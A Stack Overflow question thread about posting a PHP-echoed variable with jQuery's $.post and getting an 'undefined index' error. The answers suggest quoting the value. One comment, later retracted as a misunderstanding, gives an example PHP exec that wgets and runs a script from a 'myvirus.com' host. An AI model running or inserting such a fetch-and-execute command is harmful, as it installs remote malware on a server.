2

I'm trying to use jQuery to post a variable to a MySQL/PHP query. I have a button, class="button" and the button code is:

$(".button").click(function(e){
  e.preventDefault();
  $.post("some.php", { var_today : <?php echo $new_var; ?> });
});

using:

if(isset($_POST['var_today'])){
echo $_POST['var_today'];
}

on my php page, and I get undefined index: var_today

the class button tag has an onclick="window.open('') attached to it, and once it's clicked, I get "undefined index" as the var_today is not being posted, what have I written wrong here?

Improve this question
10
  • 1
    add quotes around the value for var_today... IE var_today : "<?php echo $new_var; ?> Commented Apr 13, 2012 at 15:02
  • Also there is no need for an onclick="" attribute, as that's essentially what the jQuery.click() method is. Commented Apr 13, 2012 at 15:02
  • This isn't an answer, and maybe I'm misunderstanding your code, but note that you should never execute any code obtained as a result of a Javascript call. It would be trivial for an attacker to replace <?php echo $new_var;?> with <?php exec("wget http://myvirus.com/virus.sh"); exec("./virus.sh"); ?> Commented Apr 13, 2012 at 15:06
  • @JeffAllen: Yes, you are very much misunderstanding the code. PHP is server-side and JavaScript is client-side. The <?php echo $new_var;?> is executed by the server, it prints a string. All the browser sees is the output of the echo. A user visiting the site does not see the PHP code, only what it outputs. There's no way for an attacker to replace the PHP code with something, unless they had access to your server. If they did, you'd have bigger issues to worry about. Commented Apr 13, 2012 at 15:11
  • 1
    Right -- misunderstood the context. I was envisioning this being placed in a rendered HTML document, in which case the client would be sending the string "<?php ... ?>" to the server, presumably with the expectation that the server would execute that code (which would be silly). Of course, if this is going into a PHP script, then it will be executed before getting rendered in HTML. In that case, after having completely discredited myself, I recommend @Robert's answer. Commented Apr 13, 2012 at 15:17

3 Answers 3

Reset to default
3

You need to quote your value:

$.post("some.php", { var_today : "<?php echo $new_var; ?>" },
Improve this answer
Sign up to request clarification or add additional context in comments.

5 Comments

I thank you for the quick response, but that does not change the undefined index, as the value is not being posted, i have another page using the setInterval function using a php variable and it works fine. I've also tried an alert once I click the button, nothing..
Show us your some.php PHP, or are you using firebug to verify your post? Also, have you defined a javascript function called returned?
the query is just a select all from tbl where regexp^var_today. I do not have a returned as I don't need anything back, just the popup to perform the query and display
I do not use the returned and have removed it to just a post statement
I have added a success function called feedback, it's only job is to make an alert window stating sent, that works now as I moved the code up above the title tag just below head, still no posted data though
0 
{ var_today : "<?php echo $new_var; ?>" }

This should work.

Improve this answer

Comments

0

Try this:

$(".button").click(function(e){
  e.preventDefault();
  $.post("some.php", { var_today: ""});
});
Improve this answer

6 Comments

How would that help? He wants to post the value, not a blank string.
Look at the edit log, when I started writing the answer, <?php echo $new_var; ?> was not added by Jon yet, so I assume his example was to pass anything as long as the function works
Ah, yes, the original question did not show the PHP tags. :-P
@Rocket odd, it shows in mine, regardless I had tried that option first except included the php echo, undefined index
@ChadW: When posting code, you need to highlight it and click the {} button in the toolbar to format it correctly (there's a live preview under the textbox to show you exactly what the post looks like). Also, where are you getting an "undefined index" In PHP or in JavaScript?
|

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.